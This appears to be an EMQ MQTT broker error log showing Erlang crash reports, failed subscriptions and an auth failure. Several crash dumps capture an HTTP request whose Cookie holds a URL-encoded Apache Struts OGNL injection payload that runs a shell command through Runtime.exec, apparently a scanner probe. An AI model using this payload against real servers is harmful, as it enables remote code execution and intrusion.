{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5911>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:11.930 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7510.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5912>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:11.932 [error] emulator Error in process <0.7510.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5912>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:12.038 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7511.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5913>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:12.039 [error] emulator Error in process <0.7511.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5913>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 19:34:46.861 [error] <0.9799.0> gen_server <0.9799.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},33482},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.9799.0>,...}) line 191
2019-02-15 19:34:46.862 [error] <0.9799.0> CRASH REPORT Process <0.9799.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},33482},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.9799.0>,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 19:34:46.862 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.9799.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},33482},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.9799.0>,...}) line 191 in context connection_crashed
2019-02-15 19:35:03.464 [error] <0.9915.0> gen_server <0.9915.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/ReturnOpen">>,...}]},...}, {proto_state,{{117,48,224,90},33690},#Fun<emqttd_client.0.18944683>,true,<<"ReturnOpen">>,<0.9915.0>,...}) line 191
2019-02-15 19:35:03.464 [error] <0.9915.0> CRASH REPORT Process <0.9915.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/ReturnOpen">>,...}]},...}, {proto_state,{{117,48,224,90},33690},#Fun<emqttd_client.0.18944683>,true,<<"ReturnOpen">>,<0.9915.0>,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 19:35:03.465 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.9915.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/ReturnOpen">>,...}]},...}, {proto_state,{{117,48,224,90},33690},#Fun<emqttd_client.0.18944683>,true,<<"ReturnOpen">>,<0.9915.0>,...}) line 191 in context connection_crashed
2019-02-15 19:35:19.631 [error] <0.10031.0> gen_server <0.10031.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},33892},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.10031.0>,...}) line 191
2019-02-15 19:35:19.631 [error] <0.10031.0> CRASH REPORT Process <0.10031.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},33892},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.10031.0>,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 19:35:19.631 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.10031.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},33892},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.10031.0>,...}) line 191 in context connection_crashed
2019-02-15 19:55:55.507 [error] <0.18432.0>@emqttd_http:authorized:142 HTTP Auth failure: username=, reason="User not found"
2019-02-15 20:27:51.197 [error] <0.31831.0>@emqttd_ws:handle_request:73 Unexpected WS Request: GET /favicon.ico
